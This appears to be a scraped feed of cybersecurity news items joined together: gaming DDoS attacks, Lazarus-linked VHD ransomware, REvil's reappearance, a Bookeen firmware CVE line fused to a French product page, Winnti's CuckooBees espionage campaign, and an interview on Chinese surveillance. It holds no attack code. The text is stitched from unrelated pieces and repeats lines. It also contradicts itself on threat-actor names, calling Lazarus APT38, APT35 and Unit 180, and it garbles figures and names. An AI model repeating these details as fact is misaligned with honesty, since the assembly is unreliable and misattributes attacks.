As the gaming sector booms, game publishers and gaming networks have been heavily targeted with distributed denial-of-service (DDoS) attacks in the last year.

For the past two years, the constraints of the COVID-19 pandemic have spawned an unprecedented surge in the online gaming industry, which is emerging as a major platform for entertainment, social interaction, and competition. By 2024, this media category could surpass $200 billion in revenue, making it one of the fastest-growing industry segments in the world, with an estimated 2 billion unique gamers worldwide.

As online gaming booms and gains a higher profile, game publishers and gaming networks are attracting unwelcome attention: a growing wave of cyberattacks that carry major costs. According to our recent threat research, gaming was one of the industries most heavily targeted by distributed denial-of-service (DDoS) attackers in 2021.

**DDoS Attacks in Gaming on the Rise  
**As it would be for any major business, data loss is a high priority for gaming companies whose servers are tempting targets for thieves seeking access to high-value databases that hold payment information, player statistics, intellectual property, and more. More recently, DDoS attacks intended to disrupt game play and bring massively multiplayer online (MMO) games to their knees have been more commonplace. Here, data is not at risk. Instead, DDoS is preventing legitimate players from accessing games, leading to user frustration, revenue loss, and reputational risk. Impact is not limited to the game itself, but also impacts businesses that rely on the game such as e-sports professionals and Twitch streamers.

**DDoS Halts Squidcraft Games Tournament  
**A recent major security incident underscores the point. In January, Twitch Rivals hosted a six-day Squid Game-themed competition — a Minecraft tournament called Squidcraft Games for Spanish-speaking gamers. About 150 contestants, including some of the platform's most famous Spanish-speaking creators (including Ibai, Rubius, and Auronplay), competed for a $100,000 purse in front of a record-setting 2 million viewers.

But what really grabbed the headlines wasn't just the high-profile competition — it was the intensive (and peculiarly timed) DDoS attacks that eventually shut down Internet access in Andorra, the small principality located between France and Spain in the Pyrenees mountains where some tournament participants live. On the fourth day of the tournament, Jan. 22, 2022, a DDoS attack reaching 100 Gbps in several short bursts impacted the Andorran competitors.

**Additional Fallout  
**News reports indicate this attack, the work of an unknown DDoS-for-hire service, knocked out about a dozen Andorran players from the competition (including E1Rubis, Biyin, TheGregfg, TaeSchnee, VioletaG, Aroyitt, 8cho, TinenQa, and Auron), and paved the way for OllieGamerz to take the top spot and $100,000. It doesn't take a lot of imagination to see how a DDoS attack — one of the simplest, cheapest, and most effective attacks — can be timed to gain a decisive advantage on high-stakes competitors and disrupt matches in a win-at-all-costs culture.

**Multifaceted Threats to Gaming's Unique Architecture  
**Online games typically employ a distinct architecture to optimally serve their customers. When a player wants to join an online game, they must first enter a "lobby" where they wait for other players to join. When enough players have gathered in the lobby, the game starts — only then can these users play the game. As a result of this architecture and their multiplayer design, online games are vulnerable to DDoS attacks through multiple dimensions: the game server itself, the game lobby, and, for some peer-to-peer multiplayer games, the individual player.

The real-time nature of gaming presents major issues because it emphasizes team scalability, which can create challenges when addressing security concerns. Of course, gaming platforms are highly sensitive to performance and outage issues. Their passionate users are vocal about outages of any kind at any time. Failing to meet user expectations can doom the reputation of a game.

The other element in play here is that the gaming sector covers a huge variety of companies, from international giants to smaller firms that address niche markets. Each eventually encounters the same issues (e.g., keeping customer data and intellectual property secure and ensuring high availability and performance). However, smaller firms may find it harder to get the right skills in place.

With the increasing shift to online gaming and the growth of e-sports, gaming companies must redouble their efforts to protect themselves and their users from cyberattacks. This means developing a good security strategy that covers all the bases. This includes design and architecture, coding and deployment, up to the hosting of the online service. These proactive measures can prevent attacks from affecting the gaming experience and protect the gamers while building trust in the integrity of their platforms and the competitions they host.

Why Security Matters Even More in Online Gaming

Source code and Bitcoin transactions point to the malware, which emerged in March 2020, being the work of APT38, researchers at Trellix said.

Source code and Bitcoin transactions point to the malware, which emerged in March 2020, being the work of APT38, researchers at Trellix said.

Cryptocurrency thief Lazarus Group appears to be widening its scope into using ransomware as a way to rip off financial institutions and other targets in the Asia-Pacific (APAC) region, researchers have found.

Financial transactions and similarities to previous malware in its source code link a recently emerged ransomware strain called VHD to the North Korean threat actors, also known as Unit 180 or APT35.

Researchers at cybersecurity firm Trellix has been tracking attacks on financial institutions from what they believe is North Korea’s cyber army—which typically generate from Lazarus Group—for the last few years. The group is perhaps best known for its deftness at ripping off the crypto-currency market through money-laundering schemes to raise money for the North Korean government.However, Lazarus also appears to have been playing the ransomware game for at least a year, Trellix revealed in a blog post this week. Researchers found that Bitcoin transactions and connections to code from ransomware previously used by the group make it likely that VHD, which emerged in March 2020, is the work of APT38, they said.

****Financial Attacks Raise Suspicion****

A significant precursor to linking Lazarus to VHD was an attempt by threat actors in February 2016 to transfer nearly US$1 billion through the SWIFT system towards recipients at other banks, according to the post by Trellix researcher Christian Beek.

“The investigation, performed by several U.S. agencies, led to a North Korean actor, dubbed ‘Hidden Cobra,'” he wrote. “Ever since then, the group has been active, compromising numerous victims.”

Hidden Cobra, active since 2014, is believed to be the work of Lazarus Group. In 2017, the FBI warned that the group was targeting U.S. businesses with malware- and botnet-related attacks.

“Over time we have observed several methods North Korea has used to gain money,” Beek wrote “Although not as frequently observed as other groups, there have also been attempts made to step into the world of ransomware.”

Trellix has followed North Korean-linked actors’ attacks on financial institutions—such as global banks, blockchain providers and users from South Korea–over the last few years. Tactics used included spear-phishing emails as well as the use of fake mobile applications and companies, researchers noted.

“Since these attacks were predominantly observed targeting the APAC region with targets in Japan and Malaysia for example, we anticipate these attacks might have been executed to discover if ransomware is a valuable way of gaining income,” Beek wrote.

****Code Links****

Knowing that ransomware has emerged a part of the toolkit of the North Korean cyber army, Trellix researchers peered under the hood of the VHD code to find similarities that they believed pointed to reuse from previous ransomware, Beek wrote.

“Using those \[code\] blocks as a starting point, a hunt was started from March 2020 onwards to discover related families,” he wrote.

Researchers identified code from four ransomware families known to be used by North Korean threat actors—BGEAF, PXJ, ZZZZ and CHiCHi–in the code of VHD.

While the Tflower and ChiChi families share only generic-function code with VHD, “the ZZZZ ransomware is almost an exact clone of the Beaf ransomware family,” which has been linked to North Korea, Beek wrote.

“Another observation is that the four letters of the ransomware ‘BEAF’ … are exactly the same first four bytes of the handshake of APT38’s tool known as Beefeater,” he added.

The use of the MATA framework in VHD—which has been used to spread the Tflower ransomware family—also links the VHD to Lazarus, as MATA has previously been linked to North Korea, researchers said.

****Following the Money****

Researchers then investigated the various ransomware families they’d linked to North Korea, which all seemed to target specific entities in APAC regions, to try to find financial overlap between then.

They extracted the Bitcoin  wallet addresses and started tracing and monitoring the transactions, though they did not find overlap in the wallets themselves, Beek wrote.

“We did find, however, that the paid ransom amounts were relatively small,” he wrote, linking a pattern between the ransomware families attributed to North Korean actors.

For example, a transaction of 2.2 Bitcoin in mid-2020 was worth around $US20,00 and was transferred multiple times through December 2020, researchers found. At that time, a transaction took place on a Bitcoin exchange to either cash out–as the value had roughly doubled–or exchange for a different and less traceable cryptocurrency, they said.

“We suspect the ransomware families … are part of more organized attacks,” Beek wrote. “Based on our research, combined intelligence, and observations of the smaller targeted ransomware attacks, Trellix attributes them to \[North Korean\] hackers with high confidence.”

VHD Ransomware Linked to North Korea’s Lazarus Group

A sample of the new REvil ransomware was found in the wild, signaling that, yes, REvil has indeed come back.
The post It’s business as usual for REvil ransomware appeared first on Malwarebytes Labs.

After the FBS arrested 14 of its members in January, and a subsequent lull in action, the REvil ransomware gang appears to be back. We say “appears” because it’s still unclear whether the group’s operations have indeed restarted.

To the trained eye, REvil’s movements seem out of sorts. When REvil’s old Tor infrastructure came back to life in April, it was modified to redirect visitors to URLs owned by a new ransomware group. The sites the nodes point to looked nothing like REvil’s. And its data leak blog is prepopulated with new ransomware victims and old REvil victims.

“And they are recruiting,” added Malwarebytes Threat Intelligence Analyst Marcelo Rivero.

**REvil ransomware: a brief look back**

When the REvil ransomware gang began its operations in 2019, it started strong. REvil, also known as Sodinokibi or Sodin, was _the_ new RaaS (ransomware as a service) of the criminal underground, filling the hole GandCrab left behind.

Like any “big-game hunting” operator, REvil only targets high-earning organizations. The logic behind this is that such targets are presumed to pay up, even a high ransom. They presumed correct.

2021 was the ransomware gang’s last year of activity. REvil attacked JBS, one of America’s largest meat and poultry processors, in June. JBS underwent recovery proceedings immediately after the attack, unlike other ransomware victims. It was revealed months after that the company paid REvil to the tune of $11M (£7.8M).

In July, REvil attacked Kaseya, the company behind Kaseya VSA, a popular remote monitoring and management software. The ransomware gang asked for a whopping $70M ransom, but the company didn’t pay. Instead, it used a decryption key “from a third party” to decrypt all its encrypted files.

Many suspected that something was up. Kaseya could not give any more details, as it was bound by an NDA (non-disclosure agreement), but the ransomware gang claimed that the decryptor was leaked by one of its operators.

**Is REvil really back?**

A ransomware sample is needed to dispel speculations on whether REvil has re-emerged or not. Sure enough, cybersecurity researcher Jakub Kroustek (@JakubKroustek) discovered one recently.

Multiple security researchers who looked into the sample said they noticed a few changes to the code based on old REvil ransomware code. The most notable changes in the encryptor are the version, the new accs configuration option, and the campaign and affiliate identifiers.

In an interview with BleepingComputer, Advanced Intel CEO Vitali Kremez said he believes this option “is used to prevent encryption on other devices that do not contain the specified accounts and Windows domains, allowing for highly targeted attacks.”

When asked about his thoughts, Rivero said, “I think this REvil sample is just a test file because it doesn’t encrypt.”

On top of this, the sample also adds a random extension name to affected files and creates a ransom note—both as text and HTML files—identical to old REvil’s. The web version of the ransom note links users back to new paid Tor sites and the new data leak blog.

The new REvil ransomware note.

Malwarebytes detects this new REvil sample as Sodinokibi.Ransom.Encrypt.DDS.

**What should previous victims do now?**

When REvil’s servers disappeared on an early Tuesday morning in July 2021, current victims of the ransomware gang were left stumped, not knowing what to do next. They were stuck in mid-negotiations, fearing they might never hear from the gang again, leaving their essential files encrypted forever.

With REvil back and the new operators apparently inheriting former victims of the old ransomware gang, what does this mean for victims?

It’s almost a year since REvil’s infrastructure went dark, and victim companies may have already moved on or sought help from law enforcement. Either way, REvil might one day come knocking at their digital doors to pick up where it left off.

It’s business as usual for REvil ransomware

Bookeen Notea Firmware BK_R_1.0.5_20210608 is affected by a directory traversal vulnerability that allows an attacker to obtain sensitive information.

**Comme sur le papier**

La saisie au stylet WACOM rapide et sensible à la pression permet de dessiner avec une grande précision. Initialement **mise au point pour les tablettes graphiques professionnelles,** cette technologie ne nécessite ni fil, ni batterie et autorise une écriture souple et précise. L’affichage instantané sur la surface texturée de l’écran à encre électronique Eink offre une expérience d'écriture identique à celle que l'on a sur papier.

*   **Saisie au stylet**
    
    Technologie Wacom avec 4096 niveaux de pression.
    
*   **Effet papier**
    
    Ecran Eink (16 niveaux de gris) lisible en plein soleil avec une résolution 1404\*1872 de 227dpi
    
*   **Grand écran**
    
    Surface d'affichage de 10,3 pouces (26cm) de diagonale équivalent au format A5
    
*   **Eclairage pour usage de nuit**
    
    Luminosité programmable avec option de réglage de la lumière bleue.
    

**Une saisie ultra-précise pour professionnels**

Initialement mise au point pour les graphistes professionnels, la technologie Wacom autorise une saisie très précise sans interférence avec l'appui de la paume sur l'écran. La Notéa est ainsi compatible avec tous les stylets Wacom et peut gérer jusqu'à 4096 niveaux de pression.

**Un nouvel outil dans votre espace de travail**

La Notéa ajoute des fonctions numériques à votre bloc-notes. Le reconnaissance d'écriture, l'annotation de livres et documents, le partage par email ou sur grand écran.

*   **Transcription des notes**
    
    Conversion automatique des notes manuscrites en texte par MyScript© (33 langues)
    
*   **Annotation de documents**
    
    Prise de notes directement sur documents PDF et EPUB
    
*   **Partage par email**
    
    Envoi et réception directs des notes et documents depuis le bloc-notes numérique.
    
*   **Affichage sur grand écran**
    
    Partage d'écran et diffusion sur téléviseur via Miracast
    

**L'expertise de l'écriture numérique**

La Notéa intègre Myscript©, le plus puissant moteur de reconnaissance d'écriture manuscrite. Les notes qu'elles soient écrites en cursives, en majuscules ou en scriptes, sont converties en quelques secondes vers un fichier Txt ou PDF. Ne laissez plus votre contenu manuscrit à l'écart de votre quotidien dans le monde numérique.

**Autonome et mobile**

Avec son poids plume, prenez votre Notéa partout avec vous. Sa batterie de haute capacité (4000 mAh) vous offrira une autonomie d'une semaine sans recharge. La Notéa possède 32Go de stockage interne et peut également se synchroniser avec différents services de Cloud.

*   **1 semaine d'autonomie**
    
    Batterie Lithium Polymer 4000mAh
    
*   **Mémoire**
    
    32 Go de stockage interne et accès aux différentes services de stockage dans le cloud via les apps.
    
*   **Transfert et partage**
    
    Connexion sans-fil Wifi : IEEE 802.11 b/g/n et Bluetooth : BT 4.2 & BLE.
    
*   **USB-C**
    
    Connecteur USB pour recharge, casque audio, connexion PC
    

**Une tablette à part entière**

La Notéa® peut être considérée comme une tablette tactile Android à part entière proposant un accès à un store d'applications. La Notéa est équipée de deux haut-parleurs et d’un micro.

*   **Interface au doigt**
    
    Ecran tactile capacitif sans interférence avec le stylet
    
*   **Audio**
    
    Haut-parleurs ou écouteurs par USB-C ou Bluetooth pour les applications audio
    
*   **Enregistrement**
    
    Microphone intégré pour les apps nécessitant un enregistrement audio et/ou une prise de son
    
*   **Store d'applications**
    
    Compatible avec le système Android 8.. Accès au Playstore pour télécharger des Apps.
    

*   **Mine texturée**
    
    La mine du stylet spécialement conçue pour procurer un touché très proche de celui de l'écriture sur papier.
    
*   **Gomme**
    
    Bouton latéral qui permet au stylet de basculer en mode gomme et d'effacer par trait ou par zone.
    
*   **Ctrl-z**
    
    Rien n'est irréversible sur la Notéa, bouton latéral d'annulation et de reprise des derniers traits réalisés au stylet.
    
*   **Bluetooth**
    
    Appairage Bluetooth avec la Notéa permettant la personnalisation et l'utilisation de trois boutons latéraux. Fonction Bluetooth rechargeable par USB.
    

**Spécifications techniques**

**Dimensions**

Modèle : CYBN10F

Fonction : Bloc-Notes numérique

Dimensions : 191,1 x 232,5 x 8,0 mm

Poids : 460 g

**Logiciel**

Système d'exploitation : Android 8.1

Play Store : Installable

**Ecran**

Taille : 10,3'' (26cm)

Résolution (Pixels) : 1404\*1872

DPI : 227

Niveaux de gris : 16

Ecran capacitif : oui

Wacom (EMR) : Oui

Front Light (FL) : Oui

Filtre lumière bleue : Oui

**Electronique**

CPU : 1.8 GHz Quad-Core

RAM : 2 Go

Stockage : 32 Go

USB 2.0 : Type C

LED de charge : Blanc

Écouteurs : Type C

Micro : Oui

Haut-parleur : Stéréo

Wi-Fi : IEEE 802.11 b/g/n

Bluetooth : BT 4.2

Bluetooth BLE : Oui

Accéléromètre : Oui

Effet Hall : Oui (Couverture intelligente)

Power button : Power on/off

**Batterie et autonomie**

Type : Lithium-Ion Polymer

Capacité : 3,7 V/4000 mAh

Consommation en veille : 2,0 mA

Durée en veille : 60 jours

**Stylet**

Wacom (EMR) : Oui (4096 niveux de pression)

Bluetooth : 3 boutons : mise en veille, haut, bas

Micro-USB : Recharge batterie pour fonction Bluetooth

**Inscription à la Newsletter**

CVE-2021-45783: Bookeen, la lecture numérique

Operation CuckooBees uncovered the state-sponsored group's sophisticated new tactics in a years-long campaign that hit more than 30 tech and manufacturing companies.

China's Winnti cyberthreat group has been quietly stealing immense stores of intellectual property and other sensitive data from manufacturing and technology companies in North America and Asia for years.

That's according to researchers from Cybereason, who estimate that the group has so far stolen hundreds of gigabytes of data from more than 30 global organizations since the cyber-espionage campaign began. Trade secrets are a big part of that, they said, including blueprints, formulas, diagrams, proprietary manufacturing documents, and other business-sensitive information.

In addition, the attackers have harvested details about a target organization's network architecture, user accounts, credentials, customer data, and business units that they could leverage in future attacks, Cybereason says in reports summarizing its investigation this week.

The security vendor said it has shared its findings with the FBI, which back in 2019 had warned of China-based cyberthreat groups engaged in the massive theft of intellectual property from US firms to support the country's "Made in China 2025" modernization initiative.

"Global manufacturers are targets of Chinese state-sponsored threat groups," says Assaf Dahan, senior director and head of threat research at Cybereason. "Our research highlights the importance of protecting Internet-facing assets, early detection of scanning activity and exploitation attempts, the ability to detect web shell activity, persistence, reconnaissance attempts by legitimate Windows tools, credential dumping, and lateral movement attempts."

Darren Williams, CEO, and founder at BlackFog, says the campaign that Cybereason observed highlights a recent trend involving data theft by cybergangs operating out of China. He says that new research that BlackFog recently conducted found that 20% of all ransomware attacks exfiltrate data to China. There's also been a dramatic rise in attacks targeting the technology, manufacturing, and government sectors, he says

“We think its related to the increasing pressure from multiple nations on the manufacturing industry generally and the shift in reliance from Chinese manufacturing," he says. "Then when you look at trade wars China has with countries like Australia, there is a general market shift happening. We think these attacks are in response and even retaliation for many of these moves.”

**Winnti Stung by CuckooBees**  
Winnti (aka APT41, Wicked Panda, or Barium) is a threat group that has been active since at least 2010. The group is believed to be working on behalf of, or with the support of, the Chinese government. Some security vendors have described Winnti as an umbrella group comprised of multiple threat actors operating under the control of China's state intelligence agencies. The group has been linked to attacks in 2010 on scores of US firms (including Google and Yahoo). And in 2020, the US government indicted five members of the threat group, although the action did little to stop its activities.

Researchers from Cybereason stumbled upon the threat group's latest campaign when investigating a 2021 intrusion at a $5 billion global manufacturing company with operations in Asia, North America, and Europe, Dahan says, and has been gathering evidence on the activity since then.

The researchers dubbed the investigation "Operation CuckooBees," because cuckoo bees are very evasive, and the Winnti group is one of the most elusive hacking groups, Dahan explains.

"Operation CuckooBees was a 12-month investigation focused on Winnti Group's global espionage campaign against defense, aerospace, energy, biotech, and pharmaceutical manufacturers," Dahan says.

**New Tools, Rare Abuse of Windows CLFS Mechanism**  
Cybereason's investigation also revealed fresh aspects of the group's technical approach, including the development of new malware tools — or new versions of its old malware — and sophisticated new techniques for payload delivery and evasion.

The new tools include one called DeployLog, made for deploying the threat group's namesake Winnti kernel-level rootkit. New versions of tools it has used in the past include an initial payload called Spyder Loader; a privilege-escalation tool called PrivateLog; and a tool called StashLog for storing payloads in a hard-to-crack Windows function.

One notable aspect of Winnti group's new campaign, according to Cybereason, is the threat actor's use of a Windows high-performance logging feature called Common Log File System (CLFS) to hide malicious payloads.

"The CLFS mechanism is rather obscure and is still undocumented by Microsoft," Dahan notes. "The attackers used the CLFS mechanism to hide their payloads in a place most security products or practitioners wouldn’t look for." He adds that the ability to abuse the mechanism points to the level of sophistication and resources that the threat actors have at their disposal.

"It requires a lot of effort to reverse-engineer this mechanism to abuse it for nefarious purposes," he says.

Dahan says Cybereason has not observed any other threat group abuse the CLFS mechanism to stash payloads in the same manner.

**The Evolving Winnti Attack Chain**  
In its latest campaign, Winnti group threat actors targeted vulnerable Internet-facing servers as a vector for gaining an initial foothold on a target network. In some instances, the attackers gained initial entry on systems by exploiting known vulnerabilities in enterprise resource planning (ERP) platforms.

"To the best of our knowledge, the vulnerabilities that were exploited in the observed attacks have fixes that were issued by the vendor," Dahan says.

Once in, Cybereason observed the attackers adopting what it described as a "house-of-cards" approach to deploying its malicious payloads, where each component of the attack chain depended on the previous one and the other components to function properly. This made it difficult to analyze each malware component in the attack chain separately.

"If for some reason, one component is missing or gets detected – the entire thing would fall apart," Dahan says.

The approach also added another layer of protection and stealth because each of the components in the attack chain is not entirely malicious on its own, and so would be unlikely to be flagged as malicious by security products, Dahan says. To become malicious, the components in the attack chain must be assembled in a certain order.

"The ‘house of cards’ approach makes it difficult for security researchers to analyze the payload and the flow of the attack," he explains. "You really have to see the entire attack and collect all the payloads and know how to run them in the exact order in which they were designed to run."

China-Backed Winnti APT Siphons Reams of US Trade Secrets in Sprawling Cyber-Espionage Attack

The US has to adapt its own policies to counter the push, warns former DocuSign CEO and Under Secretary of State Keith Krach.

Despite the block on information flowing from China, stories about the nation's surveillance state have leaked out. From social credit scores and online censorship to electronic billboards that display a citizen's "violations" like jaywalking, surveillance is a part of everyday life for millions of Chinese people.

China is increasingly exporting not only its technology but the authoritarian values that underpin them, and this spread must be contained before it moves through more of the world, says Keith Krach, who served as DocuSign CEO from 2009 to 2019 before becoming Under Secretary of State for Economic Growth, Energy, and the Environment in the Trump administration in June 2019.

Krach, who continues to advise the administration of President Joe Biden and leads the Krach Institute for Tech Diplomacy at Purdue University, was nominated for the 2022 Nobel Peace Prize for his work on China. He recently spoke with Dark Reading about China's tech-centered authoritarianism, how the country is embedding its values in its exports, and what the US must do with its own tech policies to keep a moral high ground.

This interview has been condensed for length and clarity.

    

Source: Keith Krach

**Q: You've dedicated much of your career to fighting against "techno-authoritarianism." How do you define that term? What activities rise to the level of authoritarianism?**

**Krach:** Our rivals are playing the long game in what's a four-dimensional game of military, economic, diplomatic, and cultural chess — and the crossroads, the main battleground, is technology. It all intersects there. So here's what techno-authoritarianism is in the simplest \[terms\]: It is using technology for bad instead of for good. That could be a surveillance state, dangerous military weapons, or whatever else is done for bad.

You can think of it as sort of the opposite of what we \[in the United States\] honor as a nation and in the free world at large: respecting things like the rule of law, property of all kinds, nations' sovereignty, human rights, the environment, the press. Those good principles of collaboration, like transparency, reciprocity, accountability — these are things that we honor.

But these are things that China, Russia, the authoritarians don't live by. Instead they \[rule by\] a power principle: cooperation, coercion, concealment, intimidation, retaliation, retribution. And what \[affects us all\] is that when someone doesn't play by the rules, it's no longer a free market; it's a fool's market. For example, let's say you're a Silicon Valley CEO, and I'm a Chinese company. I can steal your intellectual property, I don't have to be transparent, I can use slave labor, I can use cheap energy from big coal-fired power plants.

I don't have to obey the law — or to be \[more precise\], I _am_ the law. How can you possibly compete? I'll beat you every time. So we've got to do something about it.

**Q: You've been particularly vocal about techno-authoritarianism in China — to the extent that you can no longer visit or do business there after officials sanctioned you and your family** **\[among other former Trump officials\] last year.**

**Can you provide context on the extent of Chinese surveillance? It's especially present in Xinjiang, where authorities closely track the habits and activities of millions of Uyghurs, a Muslim minority group in the city. The US is among several countries to accuse China of committing genocide** **of the Uyghurs, but surveillance happens all over the country in varying degrees.**

**Krach:** Oh, it's literally George Orwell's _1984_. They use technology to intimidate, and there is no privacy anymore. To the extent that in Beijing and a lot of the big cities, they have these big TV-like electronic billboards where they show, for example, if somebody jaywalks crossing the street. They'll flash your picture up there, they'll show how many violations they have, all this kind of personal stuff. They know exactly where people are doing, what people are spending, I mean ... everything. They assign people social credit scores based on their behavior and decide what you can and can't do.

It creates a paranoid society where everybody feels watched, and nobody trusts anyone — because there's also incentives for turning people in for violations. It's just a nasty, nasty way to live.

**Q: Chinese authorities, of course, say this surveillance is for the good of the people. They're leveraging technology in all sorts of new projects, including so-called safe cities** **underpinned by \[Chinese telecom\] Huawei that harness all kinds of data about people's activities — ostensibly created to be like what we call smart cities here, helping get ambulances to car accidents faster and assisting police in stopping crime. But in actuality, according to groups like the bipartisan Center for Strategic and International Studies, they're tracking facial recognition and license plate data, monitoring social media, and stomping out dissent.**

**Krach:** These wired cities are a Trojan horse, the same way that what they're doing in Xinjiang is a proving ground. It's beta testing for all this stuff to roll out in China and to export elsewhere. So Xinjiang is literally a glance into the future.

China is essentially exporting a "dictatorship-in-a-box" when they send their surveillance tools \[overseas\]. These are tools that the worst of dictators could have only dreamed up. And that's the stuff that enables genocide: the whole surveillance state, literally thought control. I call it China's Great One-Way Firewall, where all the data comes in for their own use. Propaganda goes out, but the truth does not come in. That's why \[China's President\] Xi \[Jinping\] is just obsessed with technology. His biggest obsession is the semiconductor business because he knows that's the foundation of everything.

**Q: Several countries, including Kyrgyzstan and Ecuador, have adopted Chinese-made surveillance tech. That's in part because China has worked to offer less-funded governments functional and more affordable semiconductors and 5G technologies. When China exports this technology, it seems that in many cases they're exporting the values behind them as well. How can that spread of authoritarianism be stopped?**  

**Krach:** I'll take you inside what happened with 5G for an example. You heard about the 5G race all the time a couple of years ago because it looked like China's most important \[tech\] company Huawei was going to run the table for 5G. They announced 91 5G deals, 47 in Europe. So \[in the US government\] we're hitting the panic button. 5G controls are much more than cell phones: It's utility grids, Internet of Things, people's personal data, the government's more precious secrets.

Right around February 2020 \[when I was Under Secretary of State for Economic Growth, Energy, and the Environment in the Trump administration\], it seemed US efforts to stop it were failing. So our team got the authority to make a last-ditch effort to defeat their 5G master plan. We combined our team with some of the greatest Foreign Service officers, and it was like magic with that diversity of thought.

What we heard was that \[US\] government guys going around the world, saying, "Don't buy Huawei." And I go, "That's the dumbest thing I've ever heard." If I'm a CEO, I'd say to my chief of staff, "Hey, let's check out Huawei. They must have something good." So I said, "Why don't we treat the countries, the telcos, like customers? The customer's always right, and to get a customer, you must have a value proposition. Why should they partner with us if they don't get anything out of it?"

In my first 60 bilateral \[meetings\] I had as under secretary, I asked all these governments, "How's your relationship with China?" They'd say, "Oh, they're a really important trading partner." And then they'd look both ways, as if someone was there, and add, "But we don't trust them." That rang bells in my head. Because trust is the basis of every relationship — personal, business, or otherwise. You buy from people you trust. You partner with people you trust. So we went around to the CEOs of these foreign telcos and said, "Do you want to give your government's and citizens' data to a country that requires any company to turn information over to the Chinese Communist Party? Or do you want to partner with someone you trust?"

We created a digital standard of trust, called the Trust Principle, built on principles like respect for human rights and collaboration. And that was the basis for what we did with the Clean Network, a group of 60 countries that represent two-thirds of the world's global GDP, \[along with\] 200 telcos and a whole host of companies that were committed to building a 5G system completely free of bad actors and dedicated to fair principles.

It's not an anti-China thing. It's your choice: You can either be locked out of 70% of the market, or you can change the way that you do business. That moral high ground is key. In one move, we took those things that they were using against us and weaponized the very principles that protect our freedoms. In less than a year, those 91 \[Huawei\] 5G deals dropped by \[dozens and dozens\].

    

Source: Keith Krach

**Q. I want to turn the lens inward now because ideas like the Trust Principle and the Clean Network depend on maintaining that moral high ground — and they're built on essentially what we think of as fundamental American ideals — but in reality, the US has participated in surveillance itself. And in the private sector, plenty of US tech companies have had their own issues with data privacy and security, with many of their businesses based on supplying free services and monetizing the data their users provide. Can we have a leg to stand on unless we reform our own practices here in the States?**

**Krach:** It's an interesting and important question. Most people have never heard of this position, but I was the US/EU ombudsman for the data privacy shield. Now what that meant was after the Snowden episode, the Europeans go, "You know, we don't want you guys to do it again." And so they came up with a one-way data privacy shield: From a governance standpoint, if the United States snooped on a European and the Europeans found out about it, then they had a mechanism where they take it to the EU, they'd sort it out, and then it would come directly to me. There was nobody in the executive branch overseeing me on this, to be honest — it was straight with the judicial branch, and those guys were serious. "We're gonna prosecute come hell or high water. Patriotism thrown out the door; you've got to do what's right." And that was an interesting thing.

But the first thing I thought was, why isn't this reciprocal? The No. 1 thing \[I said\] when I met with the Europeans was, "Why is this a one-way thing, but you guys are shielded?" And then I'd say, "Oh, hey, how's your EU/China data privacy shield going? You have one, right?" And they're like, "Uh ... no. You know, China will be China."

Anyway, from a company standpoint, when people think of US tech companies, they think of the social and search companies like Google and Facebook. They're important companies, sure, but that's a small fraction of it. In my view, the rules of the road have not fully been written yet on data, privacy, security, data flows. It's going to take not only all three branches of our government but also the private sector and international players. If I were \[a tech CEO\], I would get out in front of this one because you can see it's going to be coming down. Things like Elon Musk buying Twitter probably would be a catalyst for that.

**Q: What, then, does the US need to do? It sounds like you think there's a lot more coming pretty soon down the pipe in terms of regulatory and compliance.**

**Krach:** Yeah, yeah. And I think it needs to be clear. But also, US companies were getting robbed blind and locked out of the Chinese market. So there's a squeeze play there, and then \[on the government level\] the EU was coming up with these regulations that just target US companies, so there's another squeeze play. But here again, it all boils down to one word: trust. You have to be able to trust the people you partner with, and you have to be trusted yourself.

**Q: As we look at how technology is evolving in general — Web3, the metaverse — there's so much emerging. Which security issues do you think should be top of mind from a policy standpoint?**

**Krach:** The first one is protect from the enemy. On _60 Minutes_, FBI Director \[Christopher\] Wray talked at length about China's cyber threat and threat to intellectual property. Because their attitude is, if it's out there and we can take it, it's your fault for not protecting it. It's a wholly different value system. 

So the second piece is educating everyone about that, especially at the corporate board level. I just wrote an article for Fortune about how companies need to have their China contingency plan. \[Business leaders\] need to ask themselves, "What is our policy to make sure that we're trusted by our customers, our shareholders, our suppliers, our partners, all the governments we do business with?"

There's some things the government can help out on. For example, we could install something like the no-bribery law, in which American companies that go overseas and are asked for bribes have the law to fall back on. They can say, "No can do, it's against the law. I'll go to jail, sorry." Why don't we make a law that it's illegal to transfer technology to the Chinese? They have that divide-and-conquer system: "You guys won't give it to me? I'll go to your competitor." So there's some things that we can do along those lines, understanding their values and how we can weaponize ours. But again here, it takes collaboration across government and the private sector. It's critical that we figure it out.

Q&A: How China Is Exporting Tech-Based Authoritarianism Across the World

A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.

A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.

Researchers from Cybereason’s Nocturnus Team have uncovered a massive, highly successful, three-year-long campaign of intellectual property theft.

The perpetrators were likely able to siphon hundreds of gigabytes worth of “sensitive proprietary information from technology and manufacturing companies mainly in East Asia, Western Europe, and North America,” according to the report released Wednesday.

The theft remained completely under the radar from law enforcement. They pulled it off by combining an “arsenal” of malware – including a brand new strain called DEPLOYLOG – into a complex infection chain.

The researchers attributed the campaign, with “moderate-to-high confidence,” to the Winnti group (aka APT 41, BARIUM,  or Blackfly). Winnti is “an exceptionally capable adversary” that is “believed to be operating on behalf of Chinese state interests and specializes in cyberespionage and intellectual property theft.”

**A Highly Successful Heist**

Researchers believe the campaign has been ongoing, traced back to 2019.

They said the Winnti began their attacks by exploiting a popular enterprise resource planning (ERP) platform used by their targets. With this foothold they installed web shells – to establish persistence – then began their reconnaissance and credential theft. With a map of the network and privileged credentials, they could move laterally to access sensitive stores of data. All of these are common strategies used by APTs around the world every day.

What distinguished Winnti’s attacks was in the details.

For one thing, they leveraged multiple vulnerabilities in that undisclosed ERP platform. Some of the vulnerabilities were publicly known, but some were zero-days.

The infection chain they crafted from there is of particular note. The researchers called it a “house of cards” – “a sophisticated and unique multi-staged infection chain with numerous payloads. Each payload fulfills a unique role in the infection chain, which is successful only upon the complete deployment of all of the payloads.”

As an example, one of these cards is DEPLOYLOG: a previously undocumented malware strain. First it’s introduced to the host machine by another module, PRIVATELOG. Then, in turn, it drops a rootkit – WINNKIT – and opens up a line of communication between the rootkit and Winnti’s command and control servers.

WINNKIT, ultimately, is what’s most important here. “A driver acting as a rootkit,” it contains a host of useful tools for transferring data from a host machine, modifying files, killing processes and much more. And despite being known to cyber analysts, the researchers noted, it possesses a near-zero detection rate in VirusTotal.

As we can see, each stage of this chain was sophisticated in and of itself. But it was their house of cards-style arrangement that made this campaign “almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order.”

